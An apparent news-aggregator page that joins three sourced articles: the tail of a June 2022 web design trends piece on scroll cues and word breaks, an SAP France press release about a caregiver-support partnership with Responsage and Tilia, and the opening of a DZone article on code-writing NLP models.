Living with OCD has a different approach with scroll and back-to-top icons paired in the bottom right corner. The scroll option includes words to help create direction and instruction. It consists of a small animation and an interactive hover state when you get close to the interactive element. The interesting thing here is that it is not actually a button, and you use a traditional scroll to interact.
3. Word Breaks
If you are a stickler for readability, this design trend might make you cringe.
In each of these designs, words are broken across lines – some with and some without hyphens. For the most part, there’s not much confusion about what the words are, but it does make you pause and think during the page experience.
Why would this be a design trend?
It’s a combination of using large typography, long words, and figuring out a solution to create a common experience between large and small screens. Many of these words would not fit on mobile screens, for example, with the same weight, scale, and impact as the desktop counterparts.
Hence, the word break solution. It creates a consistent user experience across devices.
This technique should be used only if you think your audience is savvy enough to understand what you are trying to communicate with the word break. It can be a tricky proposition!
Plantarium breaks at “plant” with a word that’s made up. But with the imagery and supporting terms, you still know immediately what the design is about.
Michelle Beatty takes a common word and breaks it. Because “photog” and “rapher” are the only letters on the screen, it’s pretty easy to figure out. What’s interesting is that the word break is not on the syllable, but the letters do stack nicely with this break visually.
Wreel Collective breaks a word with a hyphen in giant letters – something we rarely see in website design. Hyphens are not often used in this medium. Because of this, it gets your attention and makes you think about the words and the design.
Conclusion
There are a lot of rule-breaking trends in this month’s collection. They are interesting, fun, and require a certain level of risk to execute.
Could you see yourself (or your clients) opting for a design that features one of these trends? Time will tell if these visual compositions grow in popularity or begin to fade fast.
The post 3 Essential Design Trends, June 2022 first appeared on Webdesigner Depot.
Article source: Webdesignerdepot
SAP chooses the Responsage-Tilia partnership to support its employee caregivers
Levallois-Perret, 2 June 2021. Responsage, a service specialising in advice and guidance for employee caregivers, and Tilia, a start-up dedicated to supporting caregivers and backed by BNP Paribas Personal Finance, announce that SAP, the market leader in enterprise application software, has chosen their solutions to support its caregiving employees and ease their daily lives.
Caregiving: a major topic in SAP's intergenerational agreement
It is within the framework of the intergenerational agreement signed at the end of last year that SAP chose to support its employee caregivers with the services of Responsage and Tilia.
"More and more employees have to care for an elderly parent, a child, or a spouse who is ill or living with a disability," says Sandra Lotode, Director of Social Relations. "It was therefore obvious to offer caregivers, as part of our quality-of-work-life programmes, a solution that relieves them and preserves their work-life balance."
Responsage-Tilia: the ideal answer to the caregiving problem
A recognised expert in supporting employee caregivers since 2013, Responsage supports employees throughout their caregiving journey: a telephone or video interview to prioritise the issues, a documented written response within 3 working days, a personalised follow-up calendar for assembling applications, and more. The Tilia application provides digital access to the Responsage service. In addition, Tilia handles the set-up and coordination of the various service providers the cared-for person needs.
"The support scheme for employee caregivers is part of the social dimension of CSR," stresses Joël Riou, President and Founder of Responsage. "Backed by expert guidance, the employee preserves his or her physical and mental health. Moreover, thanks to the anonymised reports provided by Responsage, SAP has an objective view of the issue within the company."
"Tilia is delighted to support companies that place people at the heart of their ambitions and make caregiving a priority of their workplace well-being strategy," says Christine Lamidel, Founder and CEO of Tilia. "The Responsage-Tilia scheme simplifies caregivers' daily lives and reassures them about the well-being of their loved one. Ultimately this helps maintain their professional engagement, which is essential to breaking the isolation caregivers so often face."
About Responsage
Responsage has supported employee caregivers since 2013. The company has more than 100 clients (Danone, L'Oréal, Pernod-Ricard, Crédit Agricole, France Télévisions, Pôle emploi, and others) and covers more than 250,000 beneficiaries. Responsage relies on a team of experienced social workers, databases of more than 70,000 contacts, and an expert writing-assistance tool. The tools collect data on the employees supported and anonymise it into reports, so the company can steer its social policies.
The service has now been extended to comprehensive social support. Responsage's shareholders include Bayard Presse, Danone, Babilou and the social-impact investment fund PhiTrust. More information is available on the Responsage website.
About Tilia
Tilia is a turnkey scheme that supports companies and HR departments wishing to back employees faced with a dependent relative. This support takes a collective approach, comprising cycles of awareness-raising conferences aimed at everyone in the company, and an individual approach dedicated to caregivers. Tilia's service was designed to provide respite to employees who must combine professional activity with a caregiver role, and thus help maintain the balance of daily life. Tilia assists with every kind of fragility (illness, disability, old age, or the aftermath of a life accident) with the aim of making it easier to live well at home, easing caregivers' daily lives, and reassuring them about the well-being of their vulnerable relative.
Tilia is a committed start-up (social business) that came out of a BNP Paribas Group intrapreneurship programme, developed by its CEO and Founder Christine Lamidel following her own family experience, and is today accelerated by BNP Paribas Personal Finance. More information is available on Tilia's website and blog. @TiliaOaidants | LinkedIn
About SAP
SAP's strategy is to help every organisation run as an "intelligent enterprise". As the market leader in enterprise application software, we help companies of all sizes and in all industries run at their best: 77% of the world's commercial transactions touch an SAP® system. Our machine learning, Internet of Things (IoT) and advanced analytics technologies help our customers turn their businesses into "intelligent enterprises". SAP gives people and organisations deep business insight and fosters collaboration so they can stay ahead of their competitors. We simplify technology so that companies can use our software the way they want, without disruption. Our end-to-end suite of applications and services enables private and public customers across 25 industries worldwide to operate profitably, adapt continuously, and make a difference. With its global network of customers, partners, employees, and thought leaders, SAP helps the world run better and improves people's lives. For more information, visit www.sap.com.
The post SAP choisit le tandem Responsage-Tilia pour accompagner ses salariés aidants appeared first on SAP France News.
Article source: sap.com
NLP Models for Writing Code: Program Synthesis
Copilot, Codex, and AlphaCode: How Good Are Computer Programs That Program Computers Now?
Enabled by the rise of transformers in Natural Language Processing (NLP), we have seen a flurry of astounding deep learning models for writing code in recent years. Computer programs that can write computer programs, generally known as the program synthesis problem, have been of research interest since at least the late 1960s and early 1970s.
In the 2010s and 2020s, program synthesis research has been re-invigorated by the success of attention-based models in other sequence domains, namely the strategy of pre-training massive attention-based neural models (transformers) with millions or billions of parameters on hundreds of gigabytes of text.
Article source: DZONE